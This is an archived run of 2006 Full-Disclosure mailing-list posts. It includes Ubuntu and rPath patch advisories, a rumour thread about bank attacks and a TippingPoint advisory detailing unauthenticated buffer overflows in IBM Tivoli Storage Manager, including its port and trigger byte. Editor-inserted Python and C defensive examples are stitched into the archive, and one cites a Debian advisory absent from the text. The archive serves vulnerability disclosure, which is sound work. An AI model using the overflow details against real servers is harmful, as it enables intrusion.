They just need to spread a rumour and then sit back and watch as > all you "loyal patriots" trash your own country out of fear and cowardice. > > ObTopic: Sounds like a social engineering attack to me; attempting to > manipulate the users of a service into acting as an implicit ddos against > it. > > cheers, > DaveK > -- > Can't think of a witty .sigline today.... > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > I was only quoting (with a little creative editing) the late(?), great(?) Paul Milne of Y2K disaster fame. There's a goldmine in there... http://groups.google.com/groups/search?lr=&safe=off&num=10&q=bank+panic+author%3Apaul+milne&safe=off&qt_s=Search "If you live within 5 miles of a 7-11, you're toast" From announce-noreply at rpath.com Mon Dec 4 17:25:28 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Mon, 04 Dec 2006 12:25:28 -0500 Subject: [Full-disclosure] rPSA-2006-0211-2 doxygen libpng Message-ID: <45745a08.oQikds2tE45+5mJM%announce-noreply@rpath.com> rPath Security Advisory: 2006-0211-2 Published: 2006-11-15 Updated: 2006-12-04 added doxygen to advisory Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: libpng=/conary.rpath.com at rpl:devel//1/1.2.13-0.1-1 doxygen=/conary.rpath.com at rpl:devel//1/1.4.3-6.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793 https://issues.rpath.com/browse/RPL-790 https://issues.rpath.com/browse/RPL-824 Description: Previous versions of the libpng package are vulnerable to a denial of service attack when an application that uses libpng attempts to decode certain malformed PNG files. 
4 December 2006 Update: previous versions of the doxygen package include internal copies of the libpng and zlib libraries, and the libpng library contained multiple vulnerabilities. The doxygen package has been modified to use system shared libraries for libpng and zlib, resolving these vulnerabilities for doxygen. From zubray at gmail.com Mon Dec 4 20:32:47 2006 From: zubray at gmail.com (Zub By) Date: Mon, 4 Dec 2006 20:32:47 +0000 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <5e70f6530612040526q17a13740s4c9118844d7de1d6@mail.gmail.com> References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <5e70f6530612040526q17a13740s4c9118844d7de1d6@mail.gmail.com> Message-ID: <41aa34740612041232w41ff683obfd80db53dea433d@mail.gmail.com> Since when did web servers share resources with the rest of the bank networks? So a bank turns off its online banking system for a few hours for "maintenance", this isn't the end of the world! On 12/4/06, TheGesus wrote: > > On 12/3/06, Dave No, not that one Korn > wrote: > > TheGesus wrote: > > > > > More and more people are hearing the recommendation to "withdraw a > > > little extra cash out of the banks" to prepare for cyber attacks. If > > > as many as 1.32% of bank depositors take their advice and withdraw all > > > their money, the banks will close their doors. > > > > > > Al Qaeda threatens to disrupt the electronic bank payments system. > > > > And YOU'RE MAKING IT HAPPEN! DUH! > > > > > This system contributes about 90% of the US money supply. Without it, > > > 10% of the money supply (the cash & coin) must take over the work of > > > the other 90%. > > > > > > Conclusion: Withdraw and stockpile some cash now. Shoot for at least > > > three months' cash requirements. Don't wait. Start now. > > > > AQ don't intend to "attack the banking system". 
They plan to get > > paranoids, suckers, and conspiracy-theorists like you to do their dirty > work > > for them. They just need to spread a rumour and then sit back and watch > as > > all you "loyal patriots" trash your own country out of fear and > cowardice. > > > > ObTopic: Sounds like a social engineering attack to me; attempting to > > manipulate the users of a service into acting as an implicit ddos > against > > it. > > > > cheers, > > DaveK > > -- > > Can't think of a witty .sigline today.... > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > I was only quoting (with a little creative editing) the late(?), > great(?) Paul Milne of Y2K disaster fame. > > There's a goldmine in there... > > > http://groups.google.com/groups/search?lr=&safe=off&num=10&q=bank+panic+author%3Apaul+milne&safe=off&qt_s=Search > > "If you live within 5 miles of a 7-11, you're toast" > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061204/170a4fcd/attachment.html

From kees at ubuntu.com Mon Dec 4 22:02:10 2006
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 4 Dec 2006 14:02:10 -0800
Subject: [Full-disclosure] [USN-392-1] xine-lib vulnerability
Message-ID: <20061204220210.GI3984@outflux.net>

===========================================================
Ubuntu Security Notice USN-392-1             December 04, 2006
xine-lib vulnerability
CVE-2006-6172
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  libxine1c2                               1.0.1-1ubuntu10.7

Ubuntu 6.06 LTS:
  libxine-main1                            1.1.1+ubuntu2-7.5

Ubuntu 6.10:
  libxine1                                 1.1.2+repacked1-0ubuntu3.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

A buffer overflow was discovered in the Real Media input plugin in
xine-lib. If a user were tricked into loading a specially crafted
stream from a malicious server, the attacker could execute arbitrary
code with the user's privileges.
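Added example (editor's, not part of this USN or of the Debian advisory earlier on the page): the package lists that follow, like Debian's, print one "Size/MD5" pair per file. For a machine that cannot use apt directly and has the .deb files sideloaded, this script turns those lines into a table and checks each downloaded file's size and digest against it. The advisory text and the two fake .deb files in demo() are constructed fixtures; it assumes the files were saved under the basename of the advisory URL in one directory.

```python
"""Verify sideloaded packages against the Size/MD5 lines of an advisory.

Editor's example; not part of the Ubuntu or Debian advisories. The
advisory snippet and files in demo() are constructed test data.
"""
import hashlib
import os
import re
import tempfile

# Debian writes "Size/MD5 checksum:", Ubuntu writes "Size/MD5:"; both are
# followed by the byte count and a 32-hex-digit MD5. The URL may sit on
# the line before, so \s+ is allowed to span a newline.
LINE_RE = re.compile(r"(\S+)\s+Size/MD5(?: checksum)?:\s+(\d+)\s+([0-9a-fA-F]{32})")


def parse_advisory(text):
    """Map basename -> (size, md5) for every package line in advisory text."""
    return {url.rsplit("/", 1)[-1]: (int(size), md5.lower())
            for url, size, md5 in LINE_RE.findall(text)}


def md5_of(path, chunk=1 << 16):
    """Stream a file through MD5 so large .deb files are not read into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_dir(entries, directory):
    """Return {basename: 'ok' | 'missing' | 'size mismatch' | 'md5 mismatch'}.
    The size is checked first: it is free, and a mismatch rules the file
    out before any hashing is done."""
    results = {}
    for name, (size, md5) in entries.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "missing"
        elif os.path.getsize(path) != size:
            results[name] = "size mismatch"
        elif md5_of(path) != md5:
            results[name] = "md5 mismatch"
        else:
            results[name] = "ok"
    return results


def demo():
    """Constructed fixture: one intact file, one same-size tampered file,
    and one file that was never downloaded."""
    good = b"not really a .deb\n" * 64
    tampered = good[:-1] + b"!"             # same length, one byte changed
    digest = hashlib.md5(good).hexdigest()
    advisory = (
        "http://security.example.org/pool/main/p/pkg/pkg-a_1.0-1_i386.deb\n"
        f"    Size/MD5 checksum: {len(good)} {digest}\n"
        "http://security.example.org/pool/main/p/pkg/pkg-b_1.0-1_i386.deb\n"
        f"    Size/MD5: {len(good)} {digest}\n"
        "http://security.example.org/pool/main/p/pkg/pkg-c_1.0-1_i386.deb\n"
        f"    Size/MD5: 12 {'0' * 32}\n"
    )
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "pkg-a_1.0-1_i386.deb"), "wb") as f:
            f.write(good)
        with open(os.path.join(d, "pkg-b_1.0-1_i386.deb"), "wb") as f:
            f.write(tampered)
        return verify_dir(parse_advisory(advisory), d)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:14} {name}")
```

Two caveats a practitioner should keep in mind. MD5 is not collision resistant, so the digest only shows that a download matches what the advisory lists; the trust comes from the PGP signature on the advisory itself (the Debian mail carries one inline, the Ubuntu mail's is the scrubbed pgp-signature attachment), and a list copied from an unsigned web page proves nothing. And on a normal system none of this is needed: apt checks the signed Release files and the per-package hashes for you, which is why the notices say a standard upgrade is sufficient.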
Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.7.diff.gz Size/MD5: 11946 ea5e6e40994f219ea88ee46def12b536 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.7.dsc Size/MD5: 1187 2a4db66f12bce54bfa453e49c4cec531 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz Size/MD5: 7774954 9be804b337c6c3a2e202c5a7237cb0f8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_amd64.deb Size/MD5: 109216 0130ccfcc467dfd0bd25886db806c377 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_amd64.deb Size/MD5: 3611828 233e2ab263ec680c67b794d0689d27ee i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_i386.deb Size/MD5: 109210 f2a3fdf298acaa78b74bec58a7090d53 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_i386.deb Size/MD5: 4005142 576a8b340ba09c9241a018ab46cf44e4 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_powerpc.deb Size/MD5: 109230 2719c275e06f4215d7f1b36900ca6411 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_powerpc.deb Size/MD5: 3850402 ff0041a720565876bce10d7a250c1469 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_sparc.deb Size/MD5: 109224 b628e6801a7c0def40d01234a547b07e http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_sparc.deb Size/MD5: 3695786 55a326fd10cc11aed4bdf090b4fdb3fb Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.5.diff.gz Size/MD5: 19624 bc3bcd25cd87d3acc5cc5b0d2491944c 
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.5.dsc Size/MD5: 1113 f5cf8751705551296683836d779341f1 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz Size/MD5: 6099365 5d0f3988e4d95f6af6f3caf2130ee992 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_amd64.deb Size/MD5: 115738 773156901500dd6cdc71738a04545704 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_amd64.deb Size/MD5: 2615152 023384da81522f625b2f774b9dc66ea8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_i386.deb Size/MD5: 115744 2690e4f3c56f99d984da7ca0d1bf684c http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_i386.deb Size/MD5: 2934258 1e93778bed32747a3b2cffe2b4d641b7 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_powerpc.deb Size/MD5: 115746 8f9e092f5ef63abc10e23dc4b611f965 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_powerpc.deb Size/MD5: 2724898 f144069c4a0f87595b432c8911a1948a sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_sparc.deb Size/MD5: 115746 c4c2748bc59648ebd54764339eb01801 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_sparc.deb Size/MD5: 2591670 6fb14b10541e18b84757888994abcfc4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.2.diff.gz Size/MD5: 71320 7cd3d7f480eb049e33e6c98bd12dcf53 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.2.dsc Size/MD5: 1445 cc9290432a85b3b4a4f189b264f71083 
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1.orig.tar.gz Size/MD5: 4583422 9c05a6397838e4e2e9c419e898e4b930 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine-main1_1.1.2+repacked1-0ubuntu3.2_all.deb Size/MD5: 38946 8120c98e3303e118da3bcc72b17c3555 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_amd64.deb Size/MD5: 118880 d255df065d3f0a4dfdb41fd052002c1b http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_amd64.deb Size/MD5: 3442784 3a397cd06f001294e87c8a643224e01d http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_amd64.deb Size/MD5: 2914488 a214c7af8d360dfd2c198e6ae1213956 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_i386.deb Size/MD5: 118874 c9314715a8361ffc0046e981abc49172 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_i386.deb Size/MD5: 3771764 7e3a534a4ea98ac065dec40376dcc520 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_i386.deb Size/MD5: 3221924 b86497b00c1b4cbad1889aa102ffb779 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_powerpc.deb Size/MD5: 118888 822c79d2879d62a3119dd5a37bda2df4 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_powerpc.deb Size/MD5: 3469392 65d938ff9c114b436f9bb2df81da2a9f http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_powerpc.deb Size/MD5: 3043066 280e1c942fb7ee3a66117342f848bcb2 sparc architecture (Sun SPARC/UltraSPARC) 
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_sparc.deb
      Size/MD5:   118888 1b3224f90d39958a411b23c841d788bb
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_sparc.deb
      Size/MD5:  3136330 10a0a1e2261b098fc597c51307a596d9
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_sparc.deb
      Size/MD5:  2856892 9ba9c8b97177549067dd73631c49430c

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061204/50a10ea9/attachment.bin

From kees at ubuntu.com Mon Dec 4 22:01:56 2006
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 4 Dec 2006 14:01:56 -0800
Subject: [Full-disclosure] [USN-391-1] libgsf vulnerability
Message-ID: <20061204220156.GH3984@outflux.net>

===========================================================
Ubuntu Security Notice USN-391-1             December 04, 2006
libgsf vulnerability
CVE-2006-4514
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  libgsf-1                                 1.12.3-3ubuntu3.1

Ubuntu 6.06 LTS:
  libgsf-1-113                             1.13.99-0ubuntu2.1

Ubuntu 6.10:
  libgsf-1-114                             1.14.1-2ubuntu1.1

After a standard system upgrade you need to restart your desktop
session to effect the necessary changes.

Details follow:

A heap overflow was discovered in the OLE processing code in libgsf.
If a user were tricked into opening a specially crafted OLE document,
an attacker could execute arbitrary code with the user's privileges.
Updated packages for Ubuntu 5.10, Ubuntu 6.06 LTS and Ubuntu 6.10:
From TSRT at 3com.com Mon Dec 4 23:53:15 2006
From: TSRT at 3com.com (TSRT at 3com.com)
Date: Mon, 4 Dec 2006 15:53:15 -0800
Subject: [Full-disclosure] TSRT-06-14: IBM Tivoli Storage Manager Multiple Buffer Overflow Vulnerabilities
Message-ID:

TSRT-06-14: IBM Tivoli Storage Manager Multiple Buffer Overflow Vulnerabilities
http://www.tippingpoint.com/security/advisories/TSRT-06-14.html
December 4, 2006

-- CVE ID:
CVE-2006-5855

-- Affected Vendor:
IBM

-- Affected Products:
Tivoli Storage Manager <5.2.9
Tivoli Storage Manager <5.3.4

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since April 3, 2006 by Digital Vaccine protection filter ID 4248. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
These vulnerabilities allow attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Storage Manager.
Authentication is not required to exploit these vulnerabilities.

The specific flaws are similar and exist in the processing of messages by the Tivoli Storage Manager service, bound on TCP port 1500. The messages are structured in the form [index][size]. The 'index' field specifies an integer offset into the body of the message for a specific field, and the 'size' field specifies the size of the indexed field. As no validation is done on the index fields, an attacker can force the service to look beyond the end of the packet, often landing in unallocated memory and resulting in a denial of service. The size fields are often checked to ensure they do not exceed the bounds of the destination buffers that data is being copied to. However, we have found the following four instances where the size fields are left unchecked:

Overflow 1
The initial sign-on request contains a field to specify the language. In normal cases we've seen, this string is dscenu.txt. Typically the server will validate that the language string is no longer than 0x100 bytes. However, if the first byte of the language string is 0x18, this check will not occur, and a fixed-size buffer will be overrun.

Overflows 2 and 3
There is an overflow vulnerability in messages processed by the SmExecuteWdsfSession function. There are two fields in this request; both are copied into fixed-size buffers without any validation of their lengths.

Overflow 4
There is an overflow in the open registration message due to an unchecked copy into a fixed-size buffer for the contact field of the registration.

All four of the above detailed overflows can lead to arbitrary code execution under the context of the Tivoli service.

-- Vendor Response:
IBM has issued an update to correct this vulnerability.
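The two checks the advisory describes as missing (index validated against the packet, size validated against the destination buffer) are shown below in a bounds-checked reader for the [index][size] layout. This is an added example, not code from the TSRT advisory or from IBM; the wire encoding it assumes (32-bit big-endian index and size words followed by the message body), the 72-byte probe packet and the "dscenu.txt" sample are constructed for illustration.

```c
/* Added example (not from the TSRT advisory or IBM): a bounds-checked reader
 * for the [index][size] field layout described above. The wire encoding
 * assumed here (32-bit big-endian index and size words, then the message
 * body) is an illustration; the advisory does not specify it.
 * Build with: cc -std=c99 -Wall -o field_check field_check.c */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Outcome of one field extraction. */
enum field_status {
    FIELD_OK = 0,
    FIELD_ERR_HEADER,   /* packet too short to hold the 8-byte header   */
    FIELD_ERR_INDEX,    /* index points outside the packet              */
    FIELD_ERR_SIZE,     /* index + size runs past the end of the packet */
    FIELD_ERR_DEST      /* field larger than the fixed-size destination */
};

static uint32_t load_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Copy the field whose [index][size] header sits at hdr_off in pkt into dst
 * (capacity dst_cap, one byte kept for a terminating NUL). Every comparison
 * is on values that cannot wrap, so a hostile index or size can neither
 * read outside pkt nor write outside dst. */
enum field_status read_field(const uint8_t *pkt, size_t pkt_len, size_t hdr_off,
                             char *dst, size_t dst_cap, size_t *out_len)
{
    /* 1. The header itself must lie inside the packet. */
    if (hdr_off > pkt_len || pkt_len - hdr_off < 8)
        return FIELD_ERR_HEADER;

    uint32_t index = load_be32(pkt + hdr_off);
    uint32_t size  = load_be32(pkt + hdr_off + 4);

    /* 2. The index must land inside the packet. This is the check the
     *    advisory reports missing: without it the service reads past the
     *    end of the packet, often into unallocated memory. */
    if (index >= pkt_len)
        return FIELD_ERR_INDEX;

    /* 3. The field must end inside the packet. Written as a subtraction so
     *    that index + size cannot wrap around a 32-bit sum. */
    if (size > pkt_len - index)
        return FIELD_ERR_SIZE;

    /* 4. The field must fit the destination buffer, NUL included. This is
     *    the size check the advisory found absent in the four overflows. */
    if (dst_cap == 0 || size > dst_cap - 1)
        return FIELD_ERR_DEST;

    memcpy(dst, pkt + index, size);
    dst[size] = '\0';
    if (out_len)
        *out_len = size;
    return FIELD_OK;
}

/* Constructed packet: a header at offset 0 pointing at the 10-byte language
 * string "dscenu.txt" that follows it at offset 8. */
static const uint8_t sample_packet[] = {
    0x00, 0x00, 0x00, 0x08,                     /* index = 8  */
    0x00, 0x00, 0x00, 0x0a,                     /* size  = 10 */
    'd', 's', 'c', 'e', 'n', 'u', '.', 't', 'x', 't'
};

/* Returns 1 when the sample language string is extracted intact into a
 * 0x100-byte buffer (the limit the advisory gives for the language field). */
int sample_language_ok(void)
{
    char lang[0x100];
    size_t n = 0;
    enum field_status st = read_field(sample_packet, sizeof sample_packet, 0,
                                      lang, sizeof lang, &n);
    return st == FIELD_OK && n == 10 && strcmp(lang, "dscenu.txt") == 0;
}

/* Builds a constructed 72-byte packet (8-byte header plus a 64-byte body of
 * 'A's) carrying the given header values and reads it into a 16-byte buffer,
 * so each rejection path can be exercised with hostile values. */
enum field_status probe(uint32_t index, uint32_t size)
{
    uint8_t pkt[8 + 64];
    char dst[16];
    memset(pkt, 'A', sizeof pkt);
    for (int i = 0; i < 4; i++) {
        pkt[i]     = (uint8_t)(index >> (24 - 8 * i));
        pkt[4 + i] = (uint8_t)(size  >> (24 - 8 * i));
    }
    return read_field(pkt, sizeof pkt, 0, dst, sizeof dst, NULL);
}

int main(void)
{
    printf("sample language ok: %d\n", sample_language_ok());
    printf("index past packet:  %d\n", probe(100, 1) == FIELD_ERR_INDEX);
    printf("size wraps sum:     %d\n", probe(64, 0xffffffffu) == FIELD_ERR_SIZE);
    printf("field > dest:       %d\n", probe(8, 40) == FIELD_ERR_DEST);
    return 0;
}
```

The probe(64, 0xffffffff) case is the one a naive `index + size <= pkt_len` check would accept, because the 32-bit sum wraps to 63.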
More details can be found at:
http://www-1.ibm.com/support/docview.wss?uid=swg21250261

-- Disclosure Timeline:
2006.04.03 - Digital Vaccine released to TippingPoint customers
2006.05.09 - Vulnerability reported to vendor
2006.12.04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by the TippingPoint Security Research Team.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

From ninjadaito at hushmail.com Tue Dec 5 02:22:15 2006
From: ninjadaito at hushmail.com (ninjadaito at hushmail.com)
Date: Tue, 05 Dec 2006 13:22:15 +1100
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID: <20061205022216.C3E4DDA824@mailserver7.hushmail.com>

Bah!! Al-Qaeda this, Al-Qaeda that, links to Al-Qaeda - pfffffft! Seems that Al-Qaeda is as much under everybody's bed as Joseph McCarthy's communists once were.
Whenever anything remotely whiffy happens, Al-Qaeda is behind it. If your peanuts are all eaten or your beer is flat, it's the devious work of shadowy Al-Qaeda. The odd thing is that most everybody knows it for what it is. Except of course for poor 'ole George W. Bush and his blind followers - living in complete denial of reality. So, when the *real* wolf happens along - who will be listening? Nobody!

Speaking of the wolf - I wouldn't want to be holding too many US dollars anyway - seems the arse is going to fall out of it - we just don't know when. Buy Gold!!

Later...

Love,
Ninja.

All flames automatically redirected to the bit-bucket.

On Tue, 05 Dec 2006 00:26:21 +1100 TheGesus wrote:
>On 12/3/06, Dave No, not that one Korn wrote:
>> TheGesus wrote:
>>
>> > More and more people are hearing the recommendation to "withdraw a
>> > little extra cash out of the banks" to prepare for cyber attacks. If
>> > as many as 1.32% of bank depositors take their advice and withdraw all
>> > their money, the banks will close their doors.
>> >
>> > Al Qaeda threatens to disrupt the electronic bank payments system.
>>
>> And YOU'RE MAKING IT HAPPEN! DUH!
>>
>> > This system contributes about 90% of the US money supply. Without it,
>> > 10% of the money supply (the cash & coin) must take over the work of
>> > the other 90%.
>> >
>> > Conclusion: Withdraw and stockpile some cash now. Shoot for at least
>> > three months' cash requirements. Don't wait. Start now.
>>
>> AQ don't intend to "attack the banking system". They plan to get
>> paranoids, suckers, and conspiracy-theorists like you to do their dirty work
>> for them. They just need to spread a rumour and then sit back and watch as
>> all you "loyal patriots" trash your own country out of fear and cowardice.
>>
>> ObTopic: Sounds like a social engineering attack to me; attempting to
>> manipulate the users of a service into acting as an implicit ddos against
>> it.
>>
>> cheers,
>> DaveK
>> --
>> Can't think of a witty .sigline today....
>>
>
>I was only quoting (with a little creative editing) the late(?), great(?) Paul Milne of Y2K disaster fame.
>
>There's a goldmine in there...
>
>http://groups.google.com/groups/search?lr=&safe=off&num=10&q=bank+panic+author%3Apaul+milne&safe=off&qt_s=Search
>
>"If you live within 5 miles of a 7-11, you're toast"

From jabra at ccs.neu.edu Tue Dec 5 04:17:43 2006
From: jabra at ccs.neu.edu (Joshua D. Abraham)
Date: Mon, 4 Dec 2006 23:17:43 -0500
Subject: [Full-disclosure] PBNJ 2.04 - a suite of tools to monitor changes on a network over time.
Message-ID: <20061205041743.GG3958@utopia.ccs.neu.edu>

Hey,

I just wanted to announce that PBNJ 2.04 was released. There were various updates to the documentation as well as removing the need to pass -s/--scan when performing a scan.

PBNJ is a network suite to monitor changes that occur on a network over time. It does this by checking for changes on the target machine(s), which includes the details about the services running on them as well as the service state.
PBNJ parses the data from a scan and stores it in a database. PBNJ uses Nmap to perform scans.

http://prdownloads.sourceforge.net/pbnj/pbnj-2.04.tar.gz?download
http://prdownloads.sourceforge.net/pbnj/pbnj-2.04.tar.bz2?download
http://prdownloads.sourceforge.net/pbnj/pbnj-2.04.zip?download

Documentation can be found here:
http://pbnj.sourceforge.net/man.html

PBNJ is also packaged for Debian, Gentoo and FreeBSD.

Let me know if you have any questions, comments or suggestions.

Regards,
Josh

--
Joshua D. Abraham
Northeastern University
College of Computer and Information Science
www.ccs.neu.edu/home/jabra

From mnunez at cybsec.com Tue Dec 5 18:26:00 2006
From: mnunez at cybsec.com (=?ISO-8859-1?Q?Mariano_Nu=F1ez_Di_Croce?=)
Date: Tue, 05 Dec 2006 15:26:00 -0300
Subject: [Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Undocumented Features
Message-ID: <4575B9B8.4010104@cybsec.com>

(The following pre-advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf )

CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: SAP Internet Graphics Service (IGS) Undocumented Features
==================

Vulnerability Class: Undocumented Features
====================

Release Date: 12/05/2006
=============

Affected Applications:
======================
* SAP IGS 6.40 Patchlevel <= 15
* SAP IGS 7.00 Patchlevel <= 3

Affected Platforms:
===================
* AIX 64 bits
* HP-UX on IA64 64bit
* HP-UX on PA-RISC 64bit
* Linux on IA32 32bit
* Linux on IA64 64bit
* Linux on Power 64bit
* Linux on x86_64 64bit
* Linux on zSeries 64bit
* OS/400 V5R2M0
* Solaris on SPARC 64bit
* TRU64 64bit
* Windows Server on IA32 32bit
* Windows Server on IA64 64bit
* Windows Server on x64 64bit

Local / Remote: Remote
===============

Severity: Medium
=========

Author: Mariano Nuñez Di Croce
=======

Vendor Status:
==============
* Confirmed, update released.
Reference to Vulnerability Disclosure Policy:
=============================================
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
==================
